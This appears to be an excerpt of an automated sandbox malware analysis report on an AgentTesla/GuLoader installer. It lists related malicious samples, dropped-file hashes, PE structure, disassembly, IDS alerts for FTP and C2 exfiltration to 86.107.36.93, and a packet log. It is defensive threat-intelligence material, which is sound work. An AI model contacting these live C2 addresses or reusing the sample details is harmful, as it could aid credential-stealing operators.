                                          4MQ9rTK7AV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          • 86.107.36.93
                                          Doc22378670008869955430311.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          • 86.107.36.93
                                          doc222378670008869955430341.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          • 86.107.36.93
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          DIALTELECOMROmeerkat.arm5.elfGet hashmaliciousMiraiBrowse
                                          • 89.47.221.99
                                          Objedn#U00e1vka_20248481119000903.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 86.107.36.93
                                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 188.240.230.166
                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                          • 93.114.246.9
                                          #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • 92.114.2.230
                                          Amalgamers.exeGet hashmaliciousAgentTeslaBrowse
                                          • 86.107.36.93
                                          #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                          • 92.114.2.230
                                          FLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 86.107.36.93
                                          splppc.elfGet hashmaliciousUnknownBrowse
                                          • 188.209.98.177
                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                          • 93.114.114.57
                                          SERVERGARDEN-ASServergardenKftHUObjedn#U00e1vka_20248481119000903.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 185.33.55.26
                                          mips.elfGet hashmaliciousMiraiBrowse
                                          • 185.51.81.237
                                          FLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 185.33.55.26
                                          LPO 92558 & 92669.exeGet hashmaliciousFormBookBrowse
                                          • 185.33.52.20
                                          Wezwanie policji 0001308_24.docx.exeGet hashmaliciousAgentTeslaBrowse
                                          • 185.33.54.1
                                          Express One #U00e9rtes#U00edt#U01511.exeGet hashmaliciousAgentTeslaBrowse
                                          • 80.77.122.144
                                          LisectAVT_2403002A_41.exeGet hashmaliciousGuLoaderBrowse
                                          • 185.33.54.3
                                          megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                          • 185.33.54.13
                                          Swift copy.exeGet hashmaliciousFormBookBrowse
                                          • 185.33.52.20
                                          Uplata_391.cmdGet hashmaliciousDBatLoaderBrowse
                                          • 185.33.54.13
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dllZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                  uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                    uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                        Setup.exeGet hashmaliciousUnknownBrowse
                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                              Process:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):12288
                                                              Entropy (8bit):5.814115788739565
                                                              Encrypted:false
                                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: ZAMOWIEN.EXE.exe, Detection: malicious, Browse
                                                              • Filename: lw2HMxuVuf.exe, Detection: malicious, Browse
                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                              • Filename: uu8v4UUzTU.exe, Detection: malicious, Browse
                                                              • Filename: uu8v4UUzTU.exe, Detection: malicious, Browse
                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                              Reputation:high, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):2714237
                                                              Entropy (8bit):2.676439956704829
                                                              Encrypted:false
                                                              SSDEEP:12288:XdZ1laVl+7cVzst5g73O698WumZ0AY70TkXjONK2Lufw+zQ9L:NZ1lau7UstSNNVzY70T0jl2Lufp8L
                                                              MD5:8D080A6B947B931126DF9624EE517960
                                                              SHA1:648DA371FF2CA7439065045E6EF86BE315BBAA17
                                                              SHA-256:E4AB057395F1F8D0DBC1EAFBB7C46DB26F0A912974AB09CDC084364F903751B3
                                                              SHA-512:269C3B8FBBE5C2CEEFF75B77E5E2B7319F44FE9E8247097CFA00B53D80D5E0DA82230049EB765154D36AF7CCF000A50EE94FE4CB6575A578C7D0825885D7A1F9
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:.@......,.......,.......D................?.......@..........................................................................................................................................................................................................................................G...W...............h...............................................................g...............................................................j...........................................................................................................................................t...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):443849
                                                              Entropy (8bit):1.2497130148779307
                                                              Encrypted:false
                                                              SSDEEP:768:ac7PvH0g06m8EO44p5avB58Z4xunuY1TRicIrA/bjWGAgd+DArFLB+F0PNwhiV2y:Tnu+/YlZbezJVf975PexHNpRZwxM
                                                              MD5:84FA0DD1B45FB180585F2E2F50699931
                                                              SHA1:0A0463BE047F0429E8ECEE07C01B2CF1D5877C60
                                                              SHA-256:2C121ED02B618293B4402E6B21F2C732BC94085EF655406349C39F31831D498C
                                                              SHA-512:886AC6AE7EA0242F672D349E73804C24C4EF5406ECFDBAED52A96908BB32B719FAC804ABFA2F75D2C3C9B230C148881624938509BA012BC65CECAF963C9E7D28
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:..................................................z........k...........................Z..............,.........9.1................o........X.X................z....i......................................f............S.....................................r..f.................E..........................R....q..............................................t............................b......................................................8.....................2..?..........................o..........................>..Z......^...........^.@............................].....V............................d...............................+......................................................................a%...............s...D.....................................`..........................G..................U....~i........._......^.................y........E..............L....................................k............................=;.....................................................
                                                              Process:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              File Type:OpenPGP Secret Key
                                                              Category:dropped
                                                              Size (bytes):446201
                                                              Entropy (8bit):6.989655137691733
                                                              Encrypted:false
                                                              SSDEEP:12288:mdZ1laVl+7cVzst5g73O698WumZ0AY70TkXjON/:uZ1lau7UstSNNVzY70T0jo
                                                              MD5:78A2CC4C1635FDF52E244C6B50B690E7
                                                              SHA1:63CB7B1501FB000341DD107D383DE152F7E8B6A6
                                                              SHA-256:7BE06E71697FC66CA273F2A26B249D9F9AB7D9A113CA0C1878DB8C4FEADF82B8
                                                              SHA-512:AA1902F8D29F40BB5DD78A4FC7547C0BA133165F93E58DEDAF90FC381845B3BD99D6FC00F7164539DF405A2CBA7058D806A0C231FA287233DB67AD7F3174712F
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):374366
                                                              Entropy (8bit):1.2592280311366506
                                                              Encrypted:false
                                                              SSDEEP:1536:lsam/YZz1HsF/LIx4xzs+FxFWEYth0ZDmHmSwIHLh:yYXa8x4xzsbLmyHNLh
                                                              MD5:63AB01179F7F08CB3FD31A84D307923E
                                                              SHA1:FE08FC38C13FBD2B2D3FAC0ECB21A61FAC348909
                                                              SHA-256:82C098CEE0901C5EAB36E7E58F5BE50BB6A4B730A1DCCE30868A6A070B7D7B0D
                                                              SHA-512:5B5CCDBE1613BF6E0AD01568CF0730FA8E3782FF29A04FDE9EBA47FE9858E3827BE61582FB19B451DFA8FAE98D11A715458B114965FDAE58B6A0181D7D318E7E
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:...u.....................................................................!.....M............................T.........1.................m.....=..............................................................C........`.._.E...................................................................5..........................................!.:.............................................................u.....5...................................b..........................................................................5.......h..........................[(........Q...............z................................................................D.......................................................................................................................................................................y..........,.................................>...V.........z................%..................................8.........................$......._...........................................:.....
                                                              Process:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):323702
                                                              Entropy (8bit):1.2515537160589565
                                                              Encrypted:false
                                                              SSDEEP:768:EoZQ4ffHokStkE7R3fsPebnEzwBFK/UGxsF7zd3axJXZUJ9uSPHH+Xwxo4wAlU0I:Eo3ITfBkCnaS/HuAiNNo5mzagNT
                                                              MD5:B80D0CB89FE7FA621981D8D20875C6F8
                                                              SHA1:E9E5EFCC9A0BF3FCB96ED74300CB3EDA8824A903
                                                              SHA-256:56F956599D7C9C0279244826EEF098087E0792D2DF9FCDEF56808096BB7171AD
                                                              SHA-512:503B3CB4198976AF94D07938F8A74DA751CDABFEAD629FA84B50FA964E3AA7E5A9D9AEEC38A530B84EBC6CA835D453A65FBB4BE172BCC36F4B2F1716AC0AF45B
                                                              Malicious:false
                                                              Preview:..............................l..@..........|.............................................................................................................................Hz.....!.................H......................E................................,...................................................................{..........................................w.............................Z.....&....................................................qJ.......T..........................................M<...............................o..........]..............h......_........................................................i............3........................................O..............................................i......6..............q.............e....'..............b...........................H........._..............................\........................................................C...=Q....\..t......................}...............&..M....t..<.........f..+..............
                                                              Process:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):327575
                                                              Entropy (8bit):1.246488002290263
                                                              Encrypted:false
                                                              SSDEEP:768:u8Rnm6RqiOI7/5CnMuIXKM3+4MTe0vTGzJhhslmbnvlVD36APjFUNDVs1bcE8o48:RjXT6B6JmUDr5ahkRssMs7
                                                              MD5:38662E787C7D317321B9352FE6269829
                                                              SHA1:918FD791B9A00725BCD818648C25E5CBCEC3BC84
                                                              SHA-256:0AD6E32AB10E80BCDB3474B904A369AF8E6EA7F78F7422D51843F43A4B0D8FF5
                                                              SHA-512:7E707F205191ACF77966283832EE364D26CA14670C820CD7D51F2FC407521CEFD69EB17F04DEE6C75C58F47C3085F9D1707F0DEC4E81A40F67C1741C97E921B4
                                                              Malicious:false
                                                              Preview:.......7...................l...............................}............................................h......0....)..H..................7.......o..~...............................q............K..O...................................................................`.............o.........................~..........................Z....................-.....H............................................................U.............................................................y........................................................................)...............k......................................................................e........................0....................................;...............#.1....F................4...............w..-.......................j...........1.......................................................................'........................................A.......g..............O...............................................................
                                                              Process:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):456512
                                                              Entropy (8bit):1.2553692946521524
                                                              Encrypted:false
                                                              SSDEEP:768:Nh0M1M+UE28IhUidpSGkmkNebfgnKMfExKsYzoi6tW0ySuHg3b38P8c34C7yzyEX:NqELXsuJHGCKoU1ilsGzaE7rE4zPBo
                                                              MD5:417FD08AA77F114479B10D88872BF95E
                                                              SHA1:1E4630475A91EA0DD64A136CADC446FA38649A41
                                                              SHA-256:28B750C621DA76E80615C113A689BF77C32D81F5D4C5445A433206E0B3B2F0A4
                                                              SHA-512:5079A3F462F38067CB572A43625C2B2D7EB98EB062459FE045408F3DDA3E68770EFB2BC78E12AD171E2B4AACE97AD753A440E9FFB0F7F8B59D3C01608BE7E288
                                                              Malicious:false
                                                              Preview:........z.....................................................................S.....................................................................................F...............^..................D..............................................................?.....................................I...............................[....................F.................A................................b.....`......................P............................,.................dr......W........5...@......................................_.................................b.........Z.............................................o...................p.........%..............+.............................#.......J................................................A...3..................U.................................................................H.............7....................B.....................$............*..{...........................v....q.......................j................x.
                                                              Process:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):313104
                                                              Entropy (8bit):1.2523114527025023
                                                              Encrypted:false
                                                              SSDEEP:768:hCdYgMOEvuXzI1TjEbC35gF5MA2QF73GmDMi5BzXXhVVbD3507pldZytBoNpUq59:hXF0F5s82cHzHDZenqEfnpm+ijc2s
                                                              MD5:60A38455325DF314A0421F85AF3DD490
                                                              SHA1:5EDB899C3FDDB7F242573E9AFC9E92EB93C837FC
                                                              SHA-256:4229532B012088022C28B2ADED22ACB76D8882061AD020135DD761A9FAB13090
                                                              SHA-512:962B89FA92A239878C75AE702E3DEBA81A9353DDFD9E130AE4B7C4749FB6D859A0D3629F1F901B949B7E370C0BAA0024D6A92F7C2D7E656AED04219DED2568CC
                                                              Malicious:false
                                                              Preview:)....................P.....-.......8.....p...........o......G....................................Y..............................................r.........................................................................................................0...................................................B..............................B......................................,...................................................................................................0...............................................<...!.......................#......A.......g|.............C...............................................H.....Y.....E............z..._..j.....e......._....A...f..............w/.......................................................................................Q............@....................................s............8................Z........c......Y.................3.....u........T..............3.............................................t................i......
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Entropy (8bit):7.576983775968187
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:rendel#U00e9s_1023200000000000305.exe
                                                              File size:1'002'622 bytes
                                                              MD5:ff83f495808f8837a41405726ce9d7b9
                                                              SHA1:186bb042c4a61b7905ed62bde58f062725897192
                                                              SHA256:186a1d9c4703d9498b26d88451e31018ff66b7f9f135e0ed93f9ac10aa485753
                                                              SHA512:89112cc0a4b7349bbb9b9c2b2e466f895375ee099a27b6a497be3860414f9ad9d8ec87b0dd521e029fc4827ee1e1560b76e319e5b4ea12ac1b76986626f2ddca
                                                              SSDEEP:24576:+YB//x9sjWsxFLFS8Tppg8bY6yEV+ztrHvm:j9//CWWTppm65wc
                                                              TLSH:0B25123D34A1C132DDA885F2C921CEE06F9FAD04746457CF37926A1934F612D7A9A0FA
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                              Icon Hash:a41b39230387633e
                                                              Entrypoint:0x403640
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:61259b55b8912888e90f516ca08dc514
                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 000003F4h
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              push 00000020h
                                                              pop edi
                                                              xor ebx, ebx
                                                              push 00008001h
                                                              mov dword ptr [ebp-14h], ebx
                                                              mov dword ptr [ebp-04h], 0040A230h
                                                              mov dword ptr [ebp-10h], ebx
                                                              call dword ptr [004080C8h]
                                                              mov esi, dword ptr [004080CCh]
                                                              lea eax, dword ptr [ebp-00000140h]
                                                              push eax
                                                              mov dword ptr [ebp-0000012Ch], ebx
                                                              mov dword ptr [ebp-2Ch], ebx
                                                              mov dword ptr [ebp-28h], ebx
                                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                                              call esi
                                                              test eax, eax
                                                              jne 00007FA954B2752Ah
                                                              lea eax, dword ptr [ebp-00000140h]
                                                              mov dword ptr [ebp-00000140h], 00000114h
                                                              push eax
                                                              call esi
                                                              mov ax, word ptr [ebp-0000012Ch]
                                                              mov ecx, dword ptr [ebp-00000112h]
                                                              sub ax, 00000053h
                                                              add ecx, FFFFFFD0h
                                                              neg ax
                                                              sbb eax, eax
                                                              mov byte ptr [ebp-26h], 00000004h
                                                              not eax
                                                              and eax, ecx
                                                              mov word ptr [ebp-2Ch], ax
                                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                                              jnc 00007FA954B274FAh
                                                              and word ptr [ebp-00000132h], 0000h
                                                              mov eax, dword ptr [ebp-00000134h]
                                                              movzx ecx, byte ptr [ebp-00000138h]
                                                              mov dword ptr [0042A318h], eax
                                                              xor eax, eax
                                                              mov ah, byte ptr [ebp-0000013Ch]
                                                              movzx eax, ax
                                                              or eax, ecx
                                                              xor ecx, ecx
                                                              mov ch, byte ptr [ebp-2Ch]
                                                              movzx ecx, cx
                                                              shl eax, 10h
                                                              or eax, ecx
                                                              Programming Language:
                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x3a0c8.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x66760x68006f5abe9eeda26ee84b3c1ed1a6c82001False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x80000x139a0x14008c5edfd8ff9cc0135e197611be38ca18False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xa0000x203780x6004b2421975c21b032f7ea000f5e7f9fbfFalse0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .ndata0x2b0000x290000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x540000x3a0c80x3a200569952a4e5d0aa493a8c996f7131a879False0.41251260080645163data5.192863159411991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_BITMAP0x544600x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                              RT_ICON0x547c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2490388027919082
                                                              RT_ICON0x64ff00xad6ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9953151042839767
                                                              RT_ICON0x6fd600x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.2721778431784738
                                                              RT_ICON0x792080x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.28
                                                              RT_ICON0x7f9f00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.29500924214417745
                                                              RT_ICON0x84e780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3113486065186585
                                                              RT_ICON0x890a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3570539419087137
                                                              RT_ICON0x8b6480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.43902439024390244
                                                              RT_ICON0x8c6f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5020491803278688
                                                              RT_ICON0x8d0780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5948581560283688
                                                              RT_DIALOG0x8d4e00x144dataEnglishUnited States0.5216049382716049
                                                              RT_DIALOG0x8d6280x13cdataEnglishUnited States0.5506329113924051
                                                              RT_DIALOG0x8d7680x100dataEnglishUnited States0.5234375
                                                              RT_DIALOG0x8d8680x11cdataEnglishUnited States0.6056338028169014
                                                              RT_DIALOG0x8d9880xc4dataEnglishUnited States0.5918367346938775
                                                              RT_DIALOG0x8da500x60dataEnglishUnited States0.7291666666666666
                                                              RT_GROUP_ICON0x8dab00x92dataEnglishUnited States0.7191780821917808
                                                              RT_VERSION0x8db480x240dataEnglishUnited States0.5121527777777778
                                                              RT_MANIFEST0x8dd880x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                              DLLImport
                                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-09T11:51:18.116653+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549707185.33.55.2680TCP
                                                              2024-12-09T11:51:25.411752+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.54972086.107.36.9321TCP
                                                              2024-12-09T11:51:26.587377+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.54972886.107.36.9335590TCP
                                                              2024-12-09T11:51:26.708391+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.54972886.107.36.9335590TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 9, 2024 11:51:16.698937893 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:16.819375038 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:16.822705984 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:16.825259924 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:16.945446014 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.116560936 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.116574049 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.116652966 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.116704941 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.116715908 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.116765022 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.116890907 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.116962910 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.116982937 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.116992950 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.117017031 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.117029905 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.117032051 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.117041111 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.117043972 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.117068052 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.117110014 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.236637115 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.236697912 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.236735106 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.236784935 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.308773041 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.308785915 CET8049707185.33.55.26192.168.2.5
